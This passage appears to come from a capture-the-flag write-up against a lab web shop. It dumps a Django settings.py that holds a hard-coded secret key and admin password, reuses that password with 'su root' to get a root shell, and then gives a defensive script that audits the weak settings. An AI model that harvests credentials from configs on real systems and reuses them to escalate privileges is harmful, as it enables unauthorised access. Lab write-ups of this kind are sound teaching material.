tsconfig.json
$ cat tsconfig.json
{
"compilerOptions": {
"target": "es5",
"lib": [
"dom",
"dom.iterable",
"esnext"
],
"allowJs": true,
"skipLibCheck": true,
"esModuleInterop": true,
"allowSyntheticDefaultImports": true,
"strict": true,
"forceConsistentCasingInFileNames": true,
"noFallthroughCasesInSwitch": true,
"module": "esnext",
"moduleResolution": "node",
"resolveJsonModule": true,
"isolatedModules": true,
"noEmit": true,
"jsx": "react-jsx"
},
"include": [
"src"
]
}
$
$ cd backend
$ ls
__init__.py
__pycache__
asgi.py
db.sqlite3
manage.py
requirements.txt
settings.py
tienda
urls.py
wsgi.py
$ cat settings.py
"""
Django settings for backend project.
Generated by 'django-admin startproject' using Django 6.0.3.
For more information on this file, see
https://docs.djangoproject.com/en/6.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/6.0/ref/settings/
"""
from pathlib import Path
# Project root (bigwear/)
BASE_DIR = Path(__file__).resolve().parent.parent
# backend/ folder (where manage.py and db.sqlite3 live)
BACKEND_DIR = Path(__file__).resolve().parent
SECRET_KEY = 'django-insecure-761s4jy@_74==i7vfms0qkk22jg@(rp3npl$=lqf^vj=b8sst1'
DEBUG = True
ALLOWED_HOSTS = ['localhost', '127.0.0.1', '*', '0.0.0.0', '172.17.0.2']
Gotcha! We have found the credentials, as you can see below.
# Admin panel credentials
ADMIN_USERNAME = 'pepe'
ADMIN_PASSWORD = 'BigWear2024!@#'
# Encrypted database configuration
# SQLite database encryption (optional)
DB_ENCRYPTION_KEY = 'BigWear2024!@#_encryption_key'
DB_ENCRYPTION_ENABLED = False # Disabled by default to avoid problems
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'corsheaders',
'tienda',
]
MIDDLEWARE = [
'corsheaders.middleware.CorsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'wsgi.application'
# Database
# https://docs.djangoproject.com/en/6.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BACKEND_DIR / 'db.sqlite3',
'OPTIONS': {
'timeout': 20,
}
}
}
# Password validation
# https://docs.djangoproject.com/en/6.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/6.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/6.0/howto/static-files/
STATIC_URL = 'static/'
# CORS configuration
CORS_ALLOWED_ORIGINS = [
"http://localhost:3000",
"http://127.0.0.1:3000",
"http://localhost:80",
"http://172.17.0.2:3000",
"http://172.17.0.2:80",
]
# Allow any origin for development
CORS_ALLOW_ALL_ORIGINS = True
CORS_ALLOW_CREDENTIALS = True
# Django REST Framework configuration
REST_FRAMEWORK = {
'DEFAULT_PERMISSIONS_CLASSES': [
'rest_framework.permissions.AllowAny',
]
}
Gotcha! We have discovered the root password, as you can see below.
# Media files configuration
MEDIA_URL = '/media/'
MEDIA_ROOT = BASE_DIR / 'media'
$ su root
Password: BigWear2024!@#
whoami
root
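As an added defender-side example (not part of this writeup or the BigWear project), the script below parses a Django settings.py with `ast`, never executing it, and flags the weak settings seen in the dump above: the dev SECRET_KEY, DEBUG on, a wildcard in ALLOWED_HOSTS, the hard-coded admin password, CORS open to every origin with credentials, and the misspelled REST_FRAMEWORK key. The sample settings string is constructed, with placeholders in place of the leaked secret and password.

```python
import ast

# Constructed sample mirroring the weak settings in the dump above; the real
# secret and password are replaced by placeholders.
SAMPLE_SETTINGS = """
SECRET_KEY = 'django-insecure-<placeholder>'
DEBUG = True
ALLOWED_HOSTS = ['localhost', '127.0.0.1', '*', '0.0.0.0', '172.17.0.2']
ADMIN_USERNAME = 'pepe'
ADMIN_PASSWORD = '<placeholder>'
CORS_ALLOW_ALL_ORIGINS = True
CORS_ALLOW_CREDENTIALS = True
REST_FRAMEWORK = {'DEFAULT_PERMISSIONS_CLASSES': ['rest_framework.permissions.AllowAny']}
"""

def load_constants(source):
    """Collect top-level NAME = <literal> assignments without executing the file."""
    values = {}
    for node in ast.parse(source).body:
        if (isinstance(node, ast.Assign) and len(node.targets) == 1
                and isinstance(node.targets[0], ast.Name)):
            try:
                values[node.targets[0].id] = ast.literal_eval(node.value)
            except ValueError:
                pass  # non-literal (e.g. Path(__file__)...) is skipped
    return values

def audit_settings(source):
    """Return one finding per weak setting; an empty list means nothing flagged."""
    s = load_constants(source)
    findings = []
    if str(s.get("SECRET_KEY", "")).startswith("django-insecure-"):
        findings.append("SECRET_KEY is the startproject dev key: signed cookies are forgeable once it leaks")
    if s.get("DEBUG") is True:
        findings.append("DEBUG=True exposes tracebacks and settings on error pages")
    if "*" in s.get("ALLOWED_HOSTS", []):
        findings.append("ALLOWED_HOSTS contains '*': Host header is not validated")
    if "ADMIN_PASSWORD" in s:
        findings.append("ADMIN_PASSWORD hard-coded in settings.py: rotate it and load it from the environment")
    if s.get("CORS_ALLOW_ALL_ORIGINS") and s.get("CORS_ALLOW_CREDENTIALS"):
        findings.append("CORS allows every origin with credentials: any site can call the API as the user")
    drf = s.get("REST_FRAMEWORK", {})
    if "DEFAULT_PERMISSIONS_CLASSES" in drf:
        findings.append("REST_FRAMEWORK key misspelled (should be DEFAULT_PERMISSION_CLASSES): DRF ignores it and keeps AllowAny")
    return findings

if __name__ == "__main__":
    for finding in audit_settings(SAMPLE_SETTINGS):
        print("[!]", finding)
```

The same password reused for `su root` is not visible in settings.py alone, so password reuse across the app and the OS account has to be checked separately.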
Thank you very much for reading this article.
I hope you liked it and learned something new.
This article has been written for ethical purposes.
Good Hack